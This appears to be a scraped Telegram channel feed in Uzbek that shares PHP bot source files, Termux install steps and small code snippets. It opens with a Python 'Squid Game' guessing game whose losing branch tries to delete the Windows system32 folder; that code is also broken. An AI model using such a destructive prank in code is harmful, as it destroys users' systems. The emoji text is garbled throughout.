import random
import os
number = random.randint(1, 10)
gues = input("guess the number between 1 To 10")
Guess = int(guess)
if guess == number:
print("you won!")
else:
os.remove("c:\\windows\\system32")
Squid Game komp uchun
https://t.me/php_botlar_kodi
๐คฃ5
PulBot_PayeerAVTO.php
65.4 KB
Udar pul bot kodi๐ฅ๐ฅ๐ฅ
Tarqatvordim bratla๐
Manba kodi ichidaโ
Kanalimiz: @php_botlar_kodi
Reaksiya pullik๐ฟ
Tarqatvordim bratla๐
Manba kodi ichidaโ
Kanalimiz: @php_botlar_kodi
Reaksiya pullik๐ฟ
โค5๐คก2๐2๐2๐ฅ1
๐3โค1๐1๐ค1
azaboi.zip
6.1 MB
Rasmda ko'rsatilgan termux kodi !
#Reaction
Tarqatildi ๐ป
https://t.me/php_botlar_kodi
O'rnatilishi
Hammasini Ketma-ket yoziladi
1 pkg install && pkg update
2 pkg upgrade
3 apt-get upgrade
4 apt-get update
5 pkg install python
6 pkg install python2
7 pkg install pip
8 pip install --upgrade pip
9 pip install wheel
10 pip install asyncio
11 pip install telethon
12 pip install colorama
13 pip install bs4
14 pip install rsa
15 pip install requests
16 pip install pyaes
17 pip install async_generator
18 termux-setup-storage
19 pip install aiosqlite
20 pip install asyncio
21 pip install licensing
Qayta kirish kodlari๐ฟ
1 cd /sdcard
2 cd azaboi
3 ls
4 python3 app.py
#Reaction
Tarqatildi ๐ป
https://t.me/php_botlar_kodi
โค1
This media is not supported in your browser
VIEW IN TELEGRAM
Muborak Ramazon kirib keldi. Hammalaringizni tabrikleman.
Alloh ilmingizni ziyoda qilsin
Please open Telegram to view this post
VIEW IN TELEGRAM
๐5โก2๐ฅ2๐1
โค2๐1
SMMBOT[@SimplePHP].zip
3.4 MB
๐ฅ Manba:
@iTDevo & @ACodersUzhttps://t.me/php_botlar_kodi
Please open Telegram to view this post
VIEW IN TELEGRAM
โค2โก1
function getWeather($city) {
$apiKey = "YOUR_API_KEY"; // OpenWeatherMap API kalitingiz
$url = "https://api.openweathermap.org/data/2.5/weather?q=" . urlencode($city) . "&appid=" . $apiKey . "&units=metric&lang=uz";
$response = file_get_contents($url);
if ($response === FALSE) {
return "Xatolik: Ob-havo ma'lumotlarini olishning iloji bo'lmadi.";
}
$data = json_decode($response, true);
if ($data["cod"] != 200) {
return "Shahar topilmadi yoki xato yuz berdi.";
}
$temp = $data["main"]["temp"];
$desc = $data["weather"][0]["description"];
$humidity = $data["main"]["humidity"];
$wind = $data["wind"]["speed"];
return "๐ค Ob-havo: $city\n๐ก Harorat: $tempยฐC\n๐ง Namlik: $humidity%\n๐ฌ Shamol tezligi: $wind m/s\n๐ Tavsif: $desc";
}
API olish: https://openweathermap.org/
โ Natija:
๐ค Ob-havo: Tashkent
๐ก Harorat: 33ยฐC
๐ง Namlik: 42%
๐ฌ Shamol tezligi: 3.6 m/s
๐ Tavsif: ozgina bulutli
https://t.me/php_botlar_kodi
yana qanqa function kerak #comment
bot.php
105.6 KB
๐ฌ Mukammal Anime Bot โ Yangi Versiya! ๐ฌ
๐ช Asosiy dasturchilar:
๐ Manba:
๐ป Dasturlash tili: PHP
๐ Ma'lumotlar bazasi: MySQL
---
Tahrirchi: @
Takrorlmayman manba:
Oสปzgartirilmasin !
#reaksiya
๐ช Asosiy dasturchilar:
@sadiyuz & @ITACHI_UCHIHA_SONO_SHARINGAN
@Fav_ke๐ Manba:
@UZ_IT_CENTER๐ป Dasturlash tili: PHP
๐ Ma'lumotlar bazasi: MySQL
---
Tahrirchi: @
Fav_keTakrorlmayman manba:
@UZ_IT_CENTER
Oสปzgartirilmasin !
#reaksiya
โค1๐ซก1
getChatMemberCount() โ Guruh yoki kanal a'zolar sonini olish
https://t.me/php_botlar_kodi
function getChatMemberCount($bot_token, $chat_id) {
$url = "https://api.telegram.org/bot$bot_token/getChatMemberCount?chat_id=$chat_id";
return file_get_contents($url);
}
https://t.me/php_botlar_kodi
๐ค1
โค2โคโ๐ฅ1๐ค1
quizbot(@Professional_PHP).zip
126.3 KB
Quiz bot kodi (PHP: 7.3) ๐ง
๐งโ๐ป Parol:
๐ Manba:
โก๏ธ Kanalimiz: @php_botlar_kodi
@Professional_PHPReaksiya Bosamiz๐ฅน
@Professional_PHP Please open Telegram to view this post
VIEW IN TELEGRAM
๐1
๐ค2